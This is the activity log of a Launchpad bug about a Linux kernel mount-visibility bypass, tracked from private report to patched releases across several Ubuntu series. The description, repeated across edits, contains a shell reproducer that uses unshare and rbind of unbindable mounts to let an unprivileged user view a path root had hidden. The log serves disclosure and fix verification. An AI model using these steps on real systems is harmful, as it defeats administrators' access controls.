2018-08-27 06:06:22 |
Stéphane Graber |
bug |
|
|
added bug |
2018-08-27 06:06:37 |
Stéphane Graber |
bug |
|
|
added subscriber Jonathan Calmels |
2018-08-27 06:06:45 |
Stéphane Graber |
bug |
|
|
added subscriber Christian Brauner |
2018-08-27 06:07:12 |
Stéphane Graber |
bug |
|
|
added subscriber Aleksa Sarai |
2018-08-27 06:11:34 |
Stéphane Graber |
bug |
|
|
added subscriber Eric W. Biederman |
2018-08-27 14:36:34 |
Stéphane Graber |
bug |
|
|
added subscriber Tyler Hicks |
2018-08-27 14:36:41 |
Stéphane Graber |
bug |
|
|
added subscriber Seth Forshee |
2018-08-27 22:44:16 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181441/+files/0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch |
|
2018-08-28 15:29:30 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181770/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
2018-08-28 15:29:39 |
Aleksa Sarai |
attachment removed |
0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181441/+files/0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch |
|
|
2018-10-12 16:07:29 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5200460/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
2018-10-12 16:07:59 |
Aleksa Sarai |
attachment removed |
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181770/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
|
2018-10-18 20:11:45 |
Christian Brauner |
bug |
|
|
added subscriber Serge Hallyn |
2018-10-25 20:13:54 |
Eric W. Biederman |
attachment added |
|
0001-mount-Don-t-allow-MS_UNBINDABLE-on-locked-mounts.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5205601/+files/0001-mount-Don-t-allow-MS_UNBINDABLE-on-locked-mounts.patch |
|
2018-11-13 06:46:30 |
Tyler Hicks |
description |
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow an unprivileged user to see a path which was purposefully hidden by the root user.
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/devices as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow an unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/devices as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing mount namespaces which is a small (but often important) portion of the Ubuntu archive. |
|
2018-11-13 06:47:09 |
Tyler Hicks |
description |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow an unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/devices as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing mount namespaces which is a small (but often important) portion of the Ubuntu archive. |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow an unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/devices as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing user namespaces + mount propagation which is a small (but often important) portion of the Ubuntu archive. |
|
2018-11-13 07:17:41 |
Tyler Hicks |
information type |
Private Security |
Public Security |
|
2018-11-13 08:20:15 |
Ubuntu Foundations Team Bug Bot |
tags |
|
patch |
|
2018-11-13 08:20:15 |
Ubuntu Foundations Team Bug Bot |
bug |
|
|
added subscriber Joseph Salisbury |
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Disco |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Disco) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Trusty |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Trusty) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Xenial |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Xenial) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Cosmic |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Cosmic) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Bionic |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Bionic) |
|
2018-11-13 15:56:18 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Trusty): status |
New |
Fix Committed |
|
2018-11-13 22:00:13 |
Khaled El Mously |
linux (Ubuntu Xenial): status |
New |
Fix Committed |
|
2018-11-14 11:14:25 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Cosmic): status |
New |
Fix Committed |
|
2018-11-14 11:14:28 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Disco): status |
Triaged |
Fix Committed |
|
2018-11-14 11:14:32 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Bionic): status |
New |
Fix Committed |
|
2018-11-15 11:04:21 |
Brad Figg |
tags |
patch |
patch verification-needed-cosmic |
|
2018-11-16 16:36:33 |
Brad Figg |
tags |
patch verification-needed-cosmic |
patch verification-needed-cosmic verification-needed-xenial |
|
2018-11-16 16:38:28 |
Brad Figg |
tags |
patch verification-needed-cosmic verification-needed-xenial |
patch verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
|
2018-11-16 18:15:07 |
Brad Figg |
tags |
patch verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
patch verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
|
2018-11-21 03:38:39 |
Christian Brauner |
tags |
patch verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
|
2018-12-03 08:46:31 |
Launchpad Janitor |
linux (Ubuntu Trusty): status |
Fix Committed |
Fix Released |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
linux (Ubuntu Cosmic): status |
Fix Committed |
Fix Released |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-18653 |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-18955 |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-6559 |
|
2018-12-03 14:01:15 |
Launchpad Janitor |
linux (Ubuntu Bionic): status |
Fix Committed |
Fix Released |
|
2018-12-03 14:59:47 |
Launchpad Janitor |
linux (Ubuntu Xenial): status |
Fix Committed |
Fix Released |
|
2019-02-04 14:46:37 |
Launchpad Janitor |
linux (Ubuntu Disco): status |
Fix Committed |
Fix Released |
|
2019-07-24 20:23:42 |
Brad Figg |
tags |
patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
cscc patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
|